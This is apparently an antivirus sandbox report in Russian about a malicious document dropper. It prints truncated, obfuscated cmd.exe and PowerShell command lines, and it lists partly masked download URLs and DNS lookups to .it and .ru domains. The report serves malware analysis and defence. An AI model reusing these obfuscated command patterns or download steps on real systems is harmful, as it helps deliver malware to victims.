Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' bMtWEQVWRKr wsrapKojMzwzLFuDMMfZcJUGq OiRBQjKqwSYUYQ & %C^om^S^pEc% %C^om^S^pEc% /V /c set %iSilHuSFFOPzAPM%=mCPFniamWPz&&set %var1%=p&&set %var2%=ow&&set...
Сетевая активность
Подключается к
- 'ga##rl.it':80
- 'ga##rl.it':443
- 'ci##ly.it':80
- 'pa####g.nidoma.com':443
- 'ed##omp.ru':80
TCP
Запросы HTTP GET
- http://ga##rl.it/3Vid/
- http://www.ci##ly.it/qHQvlD/
- http://ed##omp.ru/HBmmyF/
Другие
- 'ga##rl.it':443
- 'ci##ly.it':443
UDP
- DNS ASK ag###ogsa.com
- DNS ASK ga##rl.it
- DNS ASK ci##ly.it
- DNS ASK pa####g.nidoma.com
- DNS ASK sa##r.ru
- DNS ASK ed##omp.ru
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' bMtWEQVWRKr wsrapKojMzwzLFuDMMfZcJUGq OiRBQjKqwSYUYQ & %C^om^S^pEc% %C^om^S^pEc% /V /c set %iSilHuSFFOPzAPM%=mCPFniamWPz&&set %var1%=p&&set %var2%=ow&&set...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' " ([RUNTimE.inTEropSErvIceS.mArSHAl]::ptrTOStRiNgUNi([ruNtIMe.InTERopsERVICes.mArshAL]::sEcurESTRiNGToglObAlALLOcuNIcODE( $('76492d1116743f0423413b16050a5345MgB8AGoAbABhADEAVwArAEkANAA1AFoAagA2...
